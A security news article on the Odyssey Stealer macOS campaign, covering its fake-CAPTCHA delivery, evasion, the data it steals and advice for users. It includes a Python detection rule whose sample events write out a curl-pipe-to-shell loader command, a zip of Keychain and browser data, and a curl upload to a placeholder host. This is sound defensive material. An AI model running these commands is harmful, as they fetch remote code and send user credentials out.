Odyssey Stealer Malware Targets macOS Users Globally with Advanced Evasion Techniques

Odyssey Stealer: The Evolving Threat Targeting macOS Users Worldwide

A new and aggressive malware campaign known as Odyssey Stealer is currently targeting macOS users globally. This sophisticated threat has rapidly expanded its reach, compromising Apple computers and systematically stealing sensitive user data, including cryptocurrency wallets, login credentials, and personal documents.

Infection Methods and Initial Spread

Odyssey Stealer infiltrates systems through deceptive means, often masquerading as legitimate software updates, fake applications, or cracked tools available on untrustworthy websites. Once installed, it discreetly harvests critical information from web browsers like Chrome and Safari, as well as the macOS Keychain. The consequences are severe, ranging from immediate financial loss due to drained cryptocurrency accounts to long-term identity theft.

Security analysts at Moonlock Lab have observed a significant spike in Odyssey Stealer activity over recent days. Initially, infections were primarily reported in the United States, France, and Spain. However, within just twenty-four hours, the campaign aggressively expanded its reach to the United Kingdom, Germany, Italy, Canada, Brazil, India, and multiple nations across Africa and Asia. This rapid proliferation underscores the malware’s viral nature and the attackers’ coordinated efforts.

Advanced Evasion Techniques

One of the most alarming aspects of this new Odyssey Stealer campaign is its ability to evade traditional security defenses through automation. The malware samples analyzed in this wave appear to be auto-generated, a technique that creates a unique digital fingerprint, or hash, for every single infection instance. While the file size and malicious functionality remain identical, this polymorphism ensures that no two files look the same to antivirus scanners relying on static signatures.

By constantly altering its code structure, the malware renders standard blocklists ineffective. Security teams have observed numerous unique SHA256 hashes associated with this single campaign, complicating mitigation efforts. This level of sophistication suggests the attackers are using automated builders to mass-produce undetectable variants, allowing the threat to slip past defenses that would typically catch older, static versions of the stealer.

Technical Analysis of Odyssey Stealer

Odyssey Stealer is identified as a rebranded version of the previously known Poseidon Stealer, now emerging as a Malware-as-a-Service operation targeting macOS users. Its primary targets appear to be individuals involved in cryptocurrency and financial sectors, especially those in Western regions. The attack employs clever social engineering through a method called Clickfix, where victims are led to fake CAPTCHA verification pages that mimic legitimate services. When the user interacts with these pages, a terminal-based AppleScript is triggered, which initiates the download and execution of the malware.

Unlike traditional infostealers, Odyssey has been built to extract a wide range of sensitive data—beyond just browser credentials. It seeks out session tokens, macOS Keychain entries, cryptocurrency wallet information, seed phrases, and even SSH keys, showing an evolved focus on financial espionage. The malware’s design is laced with stealth capabilities, including methods to persist on the system and evade detection, making it more dangerous and resilient than its predecessors.

Odyssey Stealer’s technical operation begins with an AppleScript that downloads and executes a shell script loader from a remote source. This loader then retrieves the main payload: an obfuscated binary designed to bypass debugging tools and forensic scrutiny. Once active, the malware systematically harvests a wide spectrum of information from the host device. It collects browser data, cryptocurrency wallet details, stored documents, system configuration files, and sensitive credentials from macOS Keychain. The malware is specially equipped to decrypt seed phrases from wallet apps, indicating a specific focus on targeting crypto users. The stolen data is compressed into archive files and sent to remote command-and-control servers for collection. The infrastructure used for data exfiltration appears to be strategically configured to avoid traditional security detection methods and includes servers registered through certain foreign IP services.

Implications for macOS Users

Odyssey Stealer demonstrates a significant leap in the evolution of macOS-targeted malware. Through refined social engineering tactics and technically sophisticated payload delivery, it effectively targets high-value users, especially those with financial assets stored on their machines. Its Clickfix method leverages user interaction to bypass traditional endpoint defenses, while its payload remains hidden through advanced evasion techniques. The malware’s ability to extract and decrypt wallet keys and seed phrases elevates the threat level for crypto investors. This campaign highlights how macOS is increasingly being targeted by financially motivated threat actors. Users and organizations are advised to enforce stricter controls around AppleScript execution, monitor system behavior for suspicious data compression and uploads, and adopt endpoint protection that includes heuristics for macOS environments.
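The technical analysis above lays out a three-stage chain (AppleScript launching a shell-script loader, archiving of Keychain and browser data, upload to a remote server), and this section recommends monitoring for exactly that behaviour. The following Python is an added example written for this page, not detection logic from the article or from any vendor: it runs a small correlation rule over constructed process-start events of the kind an EDR or macOS Endpoint Security client might emit, classifies each event into a stage, groups hits by process tree, and alerts when one tree shows two or more stages. The host name, user name, pids and file paths in the sample events are placeholders; the sensitive-path list and curl upload flags are assumptions chosen to match the behaviour the article describes.

```python
import os
from collections import defaultdict

# Constructed process-start events (ts, pid, ppid, executable, command line).
# Not real telemetry; "loader.example.invalid" and user "alice" are placeholders.
SAMPLE_EVENTS = [
    {"ts": 0, "pid": 700, "ppid": 1, "exe": "/usr/bin/osascript",
     "cmd": "osascript -e 'do shell script \"curl -fsSL http://loader.example.invalid/l.sh | sh\"'"},
    {"ts": 1, "pid": 701, "ppid": 700, "exe": "/bin/sh",
     "cmd": "sh -c curl -fsSL http://loader.example.invalid/l.sh | sh"},
    {"ts": 2, "pid": 702, "ppid": 701, "exe": "/usr/bin/curl",
     "cmd": "curl -fsSL http://loader.example.invalid/l.sh"},
    {"ts": 3, "pid": 800, "ppid": 1, "exe": "/usr/bin/zip",       # benign: user zips a report
     "cmd": "zip -r /Users/alice/Documents/report.zip /Users/alice/Documents/report"},
    {"ts": 4, "pid": 801, "ppid": 1, "exe": "/usr/bin/curl",      # benign: plain download
     "cmd": "curl -fsSL https://www.example.invalid/index.html"},
    {"ts": 5, "pid": 703, "ppid": 701, "exe": "/usr/bin/zip",
     "cmd": "zip -r /tmp/out.zip /Users/alice/Library/Keychains "
            "'/Users/alice/Library/Application Support/Google/Chrome'"},
    {"ts": 6, "pid": 704, "ppid": 701, "exe": "/usr/bin/curl",
     "cmd": "curl -F file=@/tmp/out.zip http://loader.example.invalid/upload"},
]

SHELLS = {"sh", "bash", "zsh"}
ARCHIVERS = {"zip", "tar", "ditto"}
# Locations the article says the stealer harvests: Keychain and browser profiles (assumed list).
SENSITIVE_PATHS = ("/Library/Keychains", "/Library/Application Support/Google/Chrome",
                   "/Library/Safari", "/Library/Cookies")
UPLOAD_FLAGS = {"-F", "-T", "--upload-file"}   # curl options that push a local file


def has_ancestor(ev, by_pid, name):
    """Walk the parent chain and report whether any ancestor executable is `name`."""
    parent = by_pid.get(ev["ppid"])
    while parent is not None:
        if os.path.basename(parent["exe"]) == name:
            return True
        parent = by_pid.get(parent["ppid"])
    return False


def root_of(ev, by_pid):
    """Pid of the top-most known ancestor; used to group one process tree."""
    while ev["ppid"] in by_pid:
        ev = by_pid[ev["ppid"]]
    return ev["pid"]


def classify(ev, by_pid):
    """Map one event to the chain stages it matches (possibly none)."""
    name = os.path.basename(ev["exe"])
    toks = ev["cmd"].split()
    stages = set()
    if name in SHELLS | {"curl"} and has_ancestor(ev, by_pid, "osascript"):
        stages.add("loader")        # AppleScript spawning a shell or curl
    if name in ARCHIVERS and any(p in ev["cmd"] for p in SENSITIVE_PATHS):
        stages.add("staging")       # compressing Keychain / browser data
    if name == "curl" and (UPLOAD_FLAGS & set(toks) or any("@/" in t for t in toks)):
        stages.add("exfil")         # uploading a local file
    return stages


def detect_stealer_chains(events, min_stages=2):
    """Correlate stage hits per process tree; alert when a tree shows >= min_stages."""
    by_pid = {e["pid"]: e for e in events}
    trees = defaultdict(lambda: {"stages": set(), "pids": []})
    for ev in sorted(events, key=lambda e: e["ts"]):
        stages = classify(ev, by_pid)
        if stages:
            tree = trees[root_of(ev, by_pid)]
            tree["stages"] |= stages
            tree["pids"].append(ev["pid"])
    return [{"root_pid": r, **t} for r, t in sorted(trees.items())
            if len(t["stages"]) >= min_stages]


if __name__ == "__main__":
    for alert in detect_stealer_chains(SAMPLE_EVENTS):
        print(f"ALERT root pid {alert['root_pid']}: "
              f"stages={sorted(alert['stages'])} pids={alert['pids']}")
```

On the sample events only the osascript-rooted tree (pid 700) fires, with all three stages present; the benign zip of a Documents folder and the plain curl download produce no stage hits on their own. Requiring two correlated stages in one process lineage, rather than alerting on any single archiver or curl invocation, is what keeps a rule like this usable on a developer workstation where both tools run constantly.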

Recommendations for Protection

To safeguard against Odyssey Stealer and similar threats, macOS users should adopt the following measures:

1. Download Software from Trusted Sources: Only obtain applications and updates from official websites or the Mac App Store to minimize the risk of downloading malicious software.

2. Exercise Caution with Terminal Commands: Avoid executing commands from unverified sources, especially those prompting you to paste code into the Terminal.

3. Implement Robust Security Solutions: Utilize comprehensive security software capable of detecting and preventing malware infections, including those employing advanced evasion techniques.

4. Regularly Update Systems: Keep your operating system and all installed applications up to date to patch vulnerabilities that could be exploited by malware.

5. Educate Yourself and Others: Stay informed about the latest cybersecurity threats and share this knowledge to foster a culture of security awareness.

By remaining vigilant and implementing these protective measures, macOS users can significantly reduce their risk of falling victim to Odyssey Stealer and other malicious campaigns.